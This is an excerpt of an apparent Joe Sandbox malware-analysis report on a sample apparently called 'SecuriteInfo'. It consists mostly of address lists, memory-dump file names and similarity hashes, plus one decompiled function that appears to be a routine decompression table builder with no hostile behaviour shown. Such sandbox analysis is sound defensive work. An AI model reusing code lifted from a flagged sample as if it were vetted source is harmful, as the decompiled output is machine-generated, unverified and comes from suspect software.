0x00000000
0x004071b0
0x004071b0
0x004071b4
0x00000000
0x00000000
0x004071ba
0x004071ba
0x004071bd
0x004071c0
0x004071c3
0x004071c5
0x004071c7
0x004071ca
0x004071cd
0x004071cd
0x004071cd
0x004071d4
0x004071d4
0x004071dc
0x004071df
0x004071e2
0x004071e5
0x004071e9
0x004071ec
0x004071ee
0x004071f1
0x004071f4
0x0040720e
0x0040720e
0x00407211
0x00000000
0x00000000
0x00407217
0x00407217
0x0040721a
0x00407221
0x00000000
0x00407221
0x004071f6
0x004071f9
0x00407200
0x00407203
0x00000000
0x00000000
0x00407229
0x00407229
0x0040724e
0x0040724e
0x0040724e
0x00407250
0x00000000
0x00000000
0x0040722e
0x0040722e
0x00407232
0x00000000
0x00000000
0x00407238
0x00407238
0x0040723b
0x0040723e
0x00407241
0x00407243
0x00407245
0x00407248
0x0040724b
0x0040724b
0x0040724b
0x00407252
0x0040725a
0x0040725d
0x00407260
0x00407262
0x00407265
0x00407265
0x00407267
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407270
0x00407275
0x00407277
0x0040727d
0x0040727f
0x00407294
0x00407296
0x00407296
0x00407281
0x00407287
0x00407289
0x0040728b
0x0040728b
0x00407298
0x0040729c
0x0040729f
0x004072a5
0x004072a5
0x004072a8
0x004072a8
0x004072a8
0x004072aa
0x00000000
0x00000000
0x004072b0
0x004072b0
0x004072b6
0x004072b8
0x004072dd
0x004072e0
0x004072e6
0x004072eb
0x004072f1
0x004072f7
0x004072f9
0x004072fc
0x00407305
0x0040730b
0x0040730b
0x004072fe
0x00407300
0x00407302
0x00407302
0x0040730d
0x00407313
0x00407315
0x00407318
0x0040731a
0x00407320
0x00407322
0x00407324
0x00407326
0x00407328
0x0040732b
0x00407334
0x00407337
0x00407337
0x0040732d
0x0040732d
0x00407330
0x00407330
0x0040732b
0x00407322
0x00407339
0x0040733b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040733b
0x004072ba
0x004072ba
0x004072c0
0x004072c6
0x004072c8
0x00000000
0x00000000
0x004072ca
0x004072ca
0x004072cc
0x004072ce
0x004072d7
0x004072d7
0x004072d0
0x004072d0
0x004072d3
0x004072d3
0x004072d9
0x004072db
0x00000000
0x00000000
0x00407341
0x00407341
0x00407346
0x00407348
0x00407349
0x0040734a
0x0040734b
0x00407351
0x00407354
0x00407357
0x0040735a
0x0040735c
0x00407362
0x00407362
0x00407365
0x00407365
0x00407365
0x00407365
0x0040736e
0x00000000
0x00000000
0x00407373
0x00407373
0x00407376
0x00407379
0x0040737b
0x00407412
0x00407412
0x00407415
0x00407417
0x00407418
0x00407419
0x0040741c
0x00000000
0x0040741c
0x00407381
0x00407381
0x00407387
0x00407389
0x004073ae
0x004073b1
0x004073b7
0x004073bc
0x004073c2
0x004073c8
0x004073ca
0x004073cd
0x004073d6
0x004073dc
0x004073dc
0x004073cf
0x004073d1
0x004073d3
0x004073d3
0x004073de
0x004073e4
0x004073e6
0x004073e9
0x004073eb
0x004073f1
0x004073f3
0x004073f5
0x004073f7
0x004073f9
0x004073fc
0x00407405
0x00407408
0x00407408
0x004073fe
0x004073fe
0x00407401
0x00407401
0x004073fc
0x004073f3
0x0040740a
0x0040740c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040740c
0x0040738b
0x0040738b
0x00407391
0x00407397
0x00407399
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739d
0x0040739f
0x004073a6
0x004073a6
0x004073a8
0x004073a1
0x004073a1
0x004073a3
0x004073a3
0x004073aa
0x004073ac
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407424
0x00407424
0x00407427
0x00407429
0x0040742c
0x0040742f
0x0040742f
0x0040742f
0x0040742f
0x00000000
0x00000000
0x00000000
0x00406add
0x00406ac1
0x00000000
0x00406ac7
0x00406aca
0x00406ad4
0x00406ad7
0x00406ada
0x00000000
0x00406ada
0x00406ac1
0x00406ae5
0x00406ae8
0x00406aec
0x00406af6
0x00406b00
0x00406b03
0x00406b09
0x00406c3d
0x00406c3f
0x00406c45
0x00406c48
0x00406c4b
0x00000000
0x00406c4b
0x00406b0f
0x00406b0f
0x00406b10
0x00406b68
0x00406b68
0x00406b6f
0x00406c15
0x00406c15
0x00406c1a
0x00406c1d
0x00406c22
0x00406c25
0x00406c2a
0x00406c2d
0x00406c32
0x00406c35
0x00406c35
0x00000000
0x00406b75
0x00406b75
0x00406b75
0x00406b75
0x00406b79
0x00406b79
0x00406b9b
0x00406b9e
0x00406ba0
0x00406ba3
0x00406ba8
0x00406b7e
0x00406b7e
0x00406b83
0x00406b85
0x00406b87
0x00406b8c
0x00406b92
0x00406b97
0x00406b99
0x00406b99
0x00406b8e
0x00406b8e
0x00406b8e
0x00406b8c
0x00000000
0x00406baa
0x00406bd7
0x00406bdc
0x00406bde
0x00406bdf
0x00406be1
0x00406be2
0x00406be2
0x00406be2
0x00406c0a
0x00406c0f
0x00406c0f
0x00000000
0x00406c0f
0x00406ba8
0x00406b6f
0x00406b12
0x00406b12
0x00406b13
0x00406b5d
0x00000000
0x00406b5d
0x00406b15
0x00406b16
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c72
0x00406c72
0x00406c72
0x00406c75
0x00000000
0x00000000
0x00406c52
0x00406c52
0x00406c56
0x00000000
0x00000000
0x00406c5c
0x00406c5c
0x00406c5f
0x00406c62
0x00406c67
0x00406c69
0x00406c6c
0x00406c6f
0x00406c6f
0x00406c6f
0x00406c77
0x00406c77
0x00406c7a
0x00406c7c
0x00406c81
0x00406c84
0x00406c86
0x00406c89
0x00000000
0x00000000
0x00406c8f
0x00406c8f
0x00406c91
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00000000
0x00000000
0x00406ca1
0x00406ca1
0x00406ca4
0x00406ca6
0x00406d44
0x00406d44
0x00406d47
0x00406d49
0x00406d49
0x00406d4c
0x00406d4f
0x00406d51
0x00406d53
0x00406d55
0x00406d55
0x00406d5e
0x00406d63
0x00406d66
0x00406d69
0x00406d6c
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d78
0x00406d78
0x00406d7e
0x00406d7e
0x00406d7e
0x00000000
0x00406d72
0x00406cac
0x00406cac
0x00406cb2
0x00406cb5
0x00406cb7
0x00406ce2
0x00406ce5
0x00406ceb
0x00406cf0
0x00406cf6
0x00406cfc
0x00406cfe
0x00406d01
0x00406d0a
0x00406d10
0x00406d10
0x00406d03
0x00406d05
0x00406d07
0x00406d07
0x00406d12
0x00406d18
0x00406d1b
0x00406d1d
0x00406d1f
0x00406d25
0x00406d27
0x00406d29
0x00406d2c
0x00406d35
0x00406d35
0x00406d37
0x00406d2e
0x00406d2e
0x00406d31
0x00406d31
0x00406d39
0x00406d39
0x00406d27
0x00406d3c
0x00406d3e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d3e
0x00406cb9
0x00406cb9
0x00406cbf
0x00406cc5
0x00406cc7
0x00000000
0x00000000
0x00406cc9
0x00406cc9
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd7
0x00406cd7
0x00406cd9
0x00406cd2
0x00406cd2
0x00406cd4
0x00406cd4
0x00406cdb
0x00406cdd
0x00406ce0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406de4
0x00406de7
0x00406dea
0x00406df0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc7
0x00406fc7
0x00406fc7
0x00406fca
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd8
0x00406fdf
0x00406fe1
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406edd
0x00406edd
0x00406edd
0x00406edf
0x00000000
0x00000000
0x00406ebd
0x00406ebd
0x00406ec1
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406eca
0x00406ecd
0x00406ed0
0x00406ed2
0x00406ed4
0x00406ed7
0x00406eda
0x00406eda
0x00406eda
0x00406ee1
0x00406ee1
0x00406ee9
0x00406eec
0x00406ef2
0x00406ef5
0x00406ef9
0x00406efd
0x00406f00
0x00406f03
0x00406f1b
0x00406f1b
0x00406f1e
0x00406f2c
0x00406f2f
0x00406f20
0x00406f20
0x00406f22
0x00406f29
0x00406f29
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5d
0x00000000
0x00000000
0x00406f38
0x00406f38
0x00406f3c
0x00000000
0x00000000
0x00406f42
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4d
0x00406f4f
0x00406f52
0x00406f55
0x00406f55
0x00406f55
0x00406f5f
0x00406f5f
0x00406f61
0x00406f63
0x00406f6e
0x00406f71
0x00406f74
0x00406f76
0x00406f78
0x00406f7a
0x00406f7d
0x00406f80
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f95
0x00406f98
0x00406f9a
0x00000000
0x00000000
0x00406fa0
0x00406fa0
0x00406fa4
0x00406fb5
0x00406fb5
0x00406fb5
0x00406fb7
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fbb
0x00406fbd
0x00406fbe
0x00406fc1
0x00406fc1
0x00406fc1
0x00406fc4
0x00000000
0x00406fc4
0x00406fa6
0x00406fa6
0x00406fa9
0x00000000
0x00000000
0x00406faf
0x00406faf
0x00000000
0x00406faf
0x00406f05
0x00406f05
0x00406f07
0x00406f09
0x00406f0c
0x00406f0f
0x00406f13
0x00406f13
0x00406fe7
0x00406fe7
0x00406fea
0x00406ff1
0x00406ff5
0x00406ff7
0x00406ffa
0x00406ffd
0x00407002
0x00407005
0x00407007
0x00407008
0x0040700b
0x00407016
0x00407019
0x00407030
0x00407035
0x0040703c
0x00407041
0x00407045
0x00407047
0x00407047
0x00407047
0x0040704a
0x0040704c
0x00000000
0x00407052
0x00407052
0x00407056
0x00407061
0x00407074
0x00407079
0x0040707e
0x00407080
0x00000000
0x00000000
0x00407086
0x00407086
0x00407089
0x0040708b
0x00407099
0x00407099
0x0040709c
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x00000000
0x004070ae
0x0040708d
0x0040708d
0x00407093
0x00000000
0x00000000
0x00000000
0x00407093
0x00000000
0x00000000
0x00000000
0x00407432
0x00407432
0x00407438
0x0040743e
0x00407443
0x00407449
0x0040744f
0x00407451
0x00407454
0x0040745d
0x00407463
0x00407463
0x00407456
0x00407458
0x0040745a
0x0040745a
0x00407465
0x00407467
0x0040746a
0x004074a5
0x004074a5
0x00000000
0x0040746c
0x0040746c
0x0040746c
0x00407472
0x00407475
0x00407477
0x004074ac
0x004074ae
0x00000000
0x004074ae
0x00000000
0x00407477
0x00000000
0x00406ab6
0x00407484
0x00000000
0x00407484
0x00406e98
0x00406e9a
0x00000000
0x00000000
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00406e9f
0x00406de4
0x00406da5
0x00407489
0x0040748c
0x0040748e
0x00407497
0x0040749d
0x00000000

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 02A11AD0 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e48d9487e1e52499eb8a5b4331cad0aaf28bf6b8f616e2ccb01f310fc66a1ccf
Instruction ID: 86005d05a28ad1d844bd01c60d824535ed18092bc9146edffd276b3cdf911b15
Opcode Fuzzy Hash: e48d9487e1e52499eb8a5b4331cad0aaf28bf6b8f616e2ccb01f310fc66a1ccf
Instruction Fuzzy Hash: 5681BE62D2E729C9E7533030C6517E55AA4CF272F2F10CB678E3AB15A07F1F4E4A8584

Uniqueness

Uniqueness Score: -1.00%

Function 02A10DF2 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbceba8bb07302033a823dc1833598e9329a6dc18cc2adeeede195118b7202ce
Instruction ID: 328473578aef3c9afc0ed0c0e4671925904ddd3d8a25d65cfc62fee41bf6c782
Opcode Fuzzy Hash: fbceba8bb07302033a823dc1833598e9329a6dc18cc2adeeede195118b7202ce
Instruction Fuzzy Hash: A671CF72E2F325D9E7532071C6553E566A0CF235B6F518B268D2BB28A47F0F0E898984

Uniqueness

Uniqueness Score: -1.00%

Function 02A10EE8 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 571f80e9c015873493755c0bd91a107b271fb2fe6b0ac49fb4013e4045cd92c2
Instruction ID: f3f1c66370c43563e92abd1adca3fa49a5b32a478f6667ec17a96e48da78b2a3
Opcode Fuzzy Hash: 571f80e9c015873493755c0bd91a107b271fb2fe6b0ac49fb4013e4045cd92c2
Instruction Fuzzy Hash: DC61BE72E2F325D9D7532070C2553E66AA0CF275F2F5187278D2BB28A47F0F0E898985

Uniqueness

Uniqueness Score: -1.00%

Function 02A11B8B Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed8fe1d91cfa75376b4575ca52076fec56989349b31a3b99803291d635cdebc
Instruction ID: 8b5a2feea0f3ea2ca9f0486044f38d6d9a2264570eac5602ef2859a5f17777c4
Opcode Fuzzy Hash: 9ed8fe1d91cfa75376b4575ca52076fec56989349b31a3b99803291d635cdebc
Instruction Fuzzy Hash: 6E71BF62E2E729C9E793303082557E556E4CF272F2F10CB679D3AB15A07F1F8E4A8485

Uniqueness

Uniqueness Score: -1.00%

Function 02A10E73 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a4c96f82c5193c44b7cc4eb9f74c118fce26880a279b154ba99b9d9f469932
Instruction ID: 1887f15481b8ceadad81e17216a75afd1529588b5b35411c295ead8571226744
Opcode Fuzzy Hash: 04a4c96f82c5193c44b7cc4eb9f74c118fce26880a279b154ba99b9d9f469932
Instruction Fuzzy Hash: 9671B072E2F325D9D7532071C2553E666A0CF275B2F518B278D3AB28647F0F0E898585

Uniqueness

Uniqueness Score: -1.00%

Function 02A11BF9 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f28f083ba13785674688682cd9639a2759c5fef2a35d87fc177b0e7ed81bc880
Instruction ID: 466ca5338af842eb7313fe391c43eeab66fc5721dc79c32799aa178648f5130d
Opcode Fuzzy Hash: f28f083ba13785674688682cd9639a2759c5fef2a35d87fc177b0e7ed81bc880
Instruction Fuzzy Hash: 9C71BD62D3E729C9E793203082657E55AA4CF272F2F10CB278D3AB15A07F1F8D4A8485

Uniqueness

Uniqueness Score: -1.00%

Function 0040755C Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00407567
0x0040756f
0x00407573
0x00407575
0x00407578
0x0040757a
0x0040757a
0x0040757c
0x00407583
0x00407585
0x00407585
0x0040758b
0x004075a0
0x004075a8
0x004075aa
0x004075ac
0x004075af
0x004075b0
0x004075b0
0x004075b6
0x00000000
0x00000000
0x004075b8
0x004075bb
0x00000000
0x00000000
0x00000000
0x004075bb
0x004075bf
0x004075c2
0x004075c4
0x004075c4
0x004075c7
0x004075cd
0x004075ce
0x00000000
0x00000000
0x00000000
0x004075ce
0x004075d3
0x004075d6
0x004075d8
0x004075d8
0x004075de
0x004075e0
0x004075f1
0x004075e4
0x004075e8
0x0040788d
0x00000000
0x0040788d
0x004075ee
0x004075ef
0x004075ef
0x004075f7
0x004075fa
0x004075fe
0x00407600
0x00407602
0x00407605
0x00000000
0x00000000
0x0040760d
0x00407613
0x00407615
0x00407617
0x00407618
0x0040762d
0x0040762d
0x00407630
0x00407632
0x00407632
0x00407634
0x00407639
0x0040763b
0x00407642
0x00407644
0x0040764c
0x0040764c
0x0040764e
0x0040764f
0x0040765e
0x00407662
0x00407666
0x00407669
0x0040766c
0x00407671
0x00407674
0x0040767a
0x00407681
0x00407687
0x00407880
0x00407880
0x00407885
0x00407894
0x00000000
0x00000000
0x00000000
0x00407885
0x00407694
0x00407697
0x0040769a
0x0040769d
0x004076a1
0x00000000
0x00000000
0x004076ac
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x004076c1
0x004076c2
0x004076c5
0x004076c8
0x004076cb
0x004076d1
0x004076d3
0x004076d3
0x004076db
0x004076df
0x004076e4
0x00407709
0x0040770f
0x00407711
0x00407713
0x00407716
0x0040771f
0x00000000
0x00000000
0x004076e6
0x004076e6
0x004076ef
0x004076f3
0x00000000
0x00000000
0x00407704
0x00407704
0x00407707
0x00000000
0x00000000
0x004076f7
0x004076fa
0x004076fc
0x00407700
0x00000000
0x00000000
0x00407702
0x00407702
0x00000000
0x00407704
0x00407728
0x0040772e
0x00407738
0x0040773a
0x0040773f
0x00407741
0x00407777
0x00407743
0x00407743
0x00407746
0x00407749
0x00407753
0x00407756
0x0040775d
0x00407768
0x0040776f
0x0040776f
0x00407779
0x0040777c
0x0040777e
0x00407784
0x00407784
0x0040778d
0x00407790
0x00407795
0x004077a4
0x004077ac
0x004077b1
0x004077d5
0x004077dd
0x004077e1
0x004077e7
0x004077b3
0x004077c1
0x004077c4
0x004077ca
0x004077ca
0x004077eb
0x004077a6
0x004077a6
0x004077a6
0x004077fc
0x00407800
0x0040780c
0x00407807
0x0040780a
0x0040780a
0x00407814
0x00407819
0x00407821
0x0040781d
0x0040781f
0x0040781f
0x00407827
0x00407829
0x00407830
0x0040783a
0x00407844
0x00407860
0x00407864
0x004076a9
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x00000000
0x004076bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407846
0x00407846
0x00407846
0x0040784b
0x00407854
0x0040785d
0x00000000
0x0040785d
0x0040786a
0x0040786a
0x0040786d
0x00407874
0x00407877
0x00000000
0x0040769a
0x0040761a
0x0040761c
0x0040761c
0x00407620
0x00407623
0x00407624
0x00407624
0x00000000
0x0040761c
0x00407590
0x00407596
0x00000000

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
